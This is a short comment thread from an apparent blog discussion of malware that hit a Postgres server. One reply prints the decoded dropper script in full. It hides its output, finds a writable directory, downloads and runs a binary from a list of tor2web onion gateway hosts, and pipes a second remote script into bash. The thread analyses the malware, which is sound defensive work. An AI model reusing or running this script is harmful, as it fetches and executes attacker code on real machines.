Discussion on: Investigation into Postgres malware (hack?)

View post

Replies for: Hey! Have you looked at the base64 encoded payload at all? The long string that is being echoed is piped into base64 -d which decodes the base64 ...

For anyone else interested, here is the malicious script after base64 decode and some tidying up:

exec &>/dev/null

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

t=tencentxjy5kpccv

dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

for i in $dir /tmp /var/tmp /dev/shm /usr/bin ; do
  echo exit > $i/i && \
    chmod +x $i/i && \
    cd $i && \
    ./i && \
    rm -f i && \
    break;
done

x() {
  f=/int
  d=./$(date|md5sum|cut -f1 -d-)
  wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || \
    curl -m99 -fsSLkA- $1$f -o$d
  chmod +x $d;$d;rm -f $d
}

u() {
  x=/crn
  wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || \
    curl -m99 -fsSLkA- $1$x
}

for h in d2web.org onion.mn tor2web.io tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
  if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
    x tencentxjy5kpccv.$h
  else
    break
  fi
done

if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
  (
    u $t.d2web.org ||
    u $t.onion.mn ||
    u $t.tor2web.io ||
    u $t.tor2web.to ||
    u $t.onion.to ||
    u $t.onion.in.net ||
    u $t.4tor.ml ||
    u $t.onion.glass ||
    u $t.civiclink.network ||
    u $t.tor2web.su ||
    u $t.onion.ly ||
    u $t.onion.pet ||
    u $t.onion.ws
  )|bash
fi

sanchitsharma • Mar 21 '20

Thanks Valts, I have added a bit commented (whatever I could understand) version to post itself. Please comment if I might have done anything wrong there.